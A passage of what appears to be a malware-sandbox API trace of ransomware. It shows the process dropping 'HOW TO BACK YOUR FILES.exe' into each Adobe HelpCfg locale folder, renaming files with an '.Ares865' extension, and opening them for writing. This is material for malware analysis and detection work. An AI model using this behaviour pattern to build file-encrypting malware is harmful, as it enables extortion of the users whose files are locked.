lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.229] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.230] GetLastError () returned 0x0 [0152.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.230] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.230] CloseHandle (hObject=0x120) returned 1 [0152.230] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.230] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.230] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.230] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.230] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.230] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.230] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.230] lstrlenW (lpString="Ares865") returned 7 [0152.231] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.231] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.231] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e5160 [0152.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.237] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" [0152.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e50e8 | out: hHeap=0x2b0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0152.237] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned 55 [0152.237] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" [0152.237] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.238] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.239] GetLastError () returned 0x0 [0152.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.239] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.239] CloseHandle (hObject=0x120) returned 1 [0152.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.239] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.239] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.239] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.239] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.239] lstrlenW (lpString="Ares865") returned 7 [0152.239] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.240] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.241] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e50e8 [0152.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" [0152.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5070 | out: hHeap=0x2b0000) returned 1 [0152.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0152.247] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned 55 [0152.247] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" [0152.247] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.247] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.247] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.248] GetLastError () returned 0x0 [0152.248] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.248] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.248] CloseHandle (hObject=0x120) returned 1 [0152.248] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.248] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.248] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.248] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.248] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.249] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.249] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.249] lstrlenW (lpString="Ares865") returned 7 [0152.249] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.249] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.250] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.251] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e5070 [0152.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.258] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" [0152.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4ff8 | out: hHeap=0x2b0000) returned 1 [0152.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0152.258] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned 55 [0152.258] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" [0152.258] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.258] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.259] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.259] GetLastError () returned 0x0 [0152.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.259] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.259] CloseHandle (hObject=0x120) returned 1 [0152.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.260] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.260] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.260] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.260] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.260] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.260] lstrlenW (lpString="Ares865") returned 7 [0152.260] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.260] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4ff8 [0152.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" [0152.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4f80 | out: hHeap=0x2b0000) returned 1 [0152.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0152.266] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned 55 [0152.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" [0152.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.267] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.268] GetLastError () returned 0x0 [0152.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.268] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.268] CloseHandle (hObject=0x120) returned 1 [0152.268] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.268] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.268] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.268] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.268] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.268] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.268] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.268] lstrlenW (lpString="Ares865") returned 7 [0152.268] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.269] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4f80 [0152.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.274] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" [0152.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4f08 | out: hHeap=0x2b0000) returned 1 [0152.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0152.274] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned 55 [0152.274] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" [0152.274] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.274] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.275] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.275] GetLastError () returned 0x0 [0152.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.275] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.275] CloseHandle (hObject=0x120) returned 1 [0152.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 